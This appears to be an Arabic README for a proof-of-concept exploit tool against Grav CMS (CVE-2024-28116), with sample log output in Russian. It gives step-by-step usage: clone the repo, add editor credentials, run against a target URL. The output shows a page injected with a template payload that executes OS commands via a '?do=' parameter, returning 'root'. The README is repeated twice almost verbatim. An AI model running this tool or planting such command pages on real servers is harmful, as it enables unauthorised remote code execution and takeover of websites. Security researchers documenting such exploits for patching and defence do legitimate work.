
هو سكربت Python من نوع PoC يستغل ثغرة حقن القوالب من جانب الخادم (SSTI) بعد المصادقة في Grav CMS الإصدارات <= 1.7.44 (CVE-2024-28116)
GenGravSSTIExploit هو سكربت Python (PoC) يستغل ثغرة حقن القوالب من جانب الخادم (SSTI) المُوثّقة في Grav CMS الإصدارات <= 1.7.44 (CVE-2024-28116). تسمح هذه الثغرة لمستخدم بصلاحيات محرر بتنفيذ أوامر نظام التشغيل على خادم بعيد.
ملاحظة: يتطلب هذا السكربت بيانات اعتماد صالحة للمصادقة على لوحة تحكم Grav CMS.
requests (قم بتثبيتها باستخدام pip install requests)استنساخ المستودع
git clone https://github.com/geniuszly/GenGravSSTIExploit
cd GenGravSSTIExploit
تكوين بيانات الاعتماد
قم بتعديل السكربت لتوفير بيانات اعتماد محرر Grav CMS الخاصة بك:
GRAV_USER = "youruser"
GRAV_PASSWORD = "yourpassword"
تشغيل السكربت
استخدم الأمر التالي لتشغيل السكربت:
python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
<TARGET_URL>: عنوان URL الهدف بالتنسيق http[s]://hostname.<PORT>: رقم المنفذ (الافتراضي هو 80).مثال:
python GenGravSSTIExploit.py -t http://example.com -p 8080
التفاعل مع الاستغلال
إذا نجح الاستغلال، فستحصل على رابط URL يمكنك من خلاله تنفيذ أوامر نظام التشغيل:
[+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
python GenGravSSTIExploit.py -t http://example.com -p 8080
سينفذ السكربت كل خطوة، وسيزودك بالتحديثات عبر الطرفية. إليك ما قد تراه:
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>
بعد اكتمال السكربت، سترى رسالة تحتوي على رابط الصفحة المحقونة. يمكنك زيارة هذا الرابط لتنفيذ أوامر نظام التشغيل:
http://example.com:8080/poc_4T7B?do=whoami
زيارة الرابط مع الأمر المحدد ستعرض المخرجات مباشرة على الصفحة:
Cmd-Output:
root
هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن صريح بها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا السكربت.
GenGravSSTIExploit هو سكربت Python (PoC) يستغل ثغرة حقن القوالب من جانب الخادم (SSTI) المُوثّقة في Grav CMS الإصدارات <= 1.7.44 (CVE-2024-28116). تسمح هذه الثغرة لمستخدم بصلاحيات محرر بتنفيذ أوامر نظام التشغيل على خادم بعيد.
ملاحظة: يتطلب السكربت بيانات اعتماد صالحة للمصادقة في لوحة إدارة Grav CMS.
requests (قم بتثبيتها عبر pip install requests)استنساخ المستودع
git clone https://github.com/geniuszly/GenGravSSTIExploit
cd GenGravSSTIExploit
تكوين بيانات الاعتماد
قم بتعديل السكربت وأدخل بيانات اعتماد محرر Grav CMS:
GRAV_USER = "youruser"
GRAV_PASSWORD = "yourpassword"
تشغيل السكربت
استخدم الأمر التالي لتشغيل السكربت:
python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
<TARGET_URL>: عنوان URL الهدف بالتنسيق http[s]://hostname.<PORT>: رقم المنفذ (الافتراضي 80).مثال:
python GenGravSSTIExploit.py -t http://example.com -p 8080
التفاعل مع الاستغلال
إذا نجح الاستغلال، فستحصل على رابط URL يمكنك من خلاله تنفيذ أوامر نظام التشغيل:
[+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_<ID>?do=<command>
python GenGravSSTIExploit.py -t http://example.com -p 8080
سينفذ السكربت كل خطوة، وسيزودك بالتحديثات عبر الطرفية. إليك ما قد تراه:
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>
بعد اكتمال عمل السكربت، سترى رسالة تحتوي على رابط الصفحة المحقونة. يمكنك زيارة هذا الرابط لتنفيذ الأوامر:
http://example.com:8080/poc_4T7B?do=whoami
زيارة الرابط مع الأمر المحدد ستعرض المخرجات مباشرة على الصفحة:
Cmd-Output:
root
هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن صريح بها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا السكربت.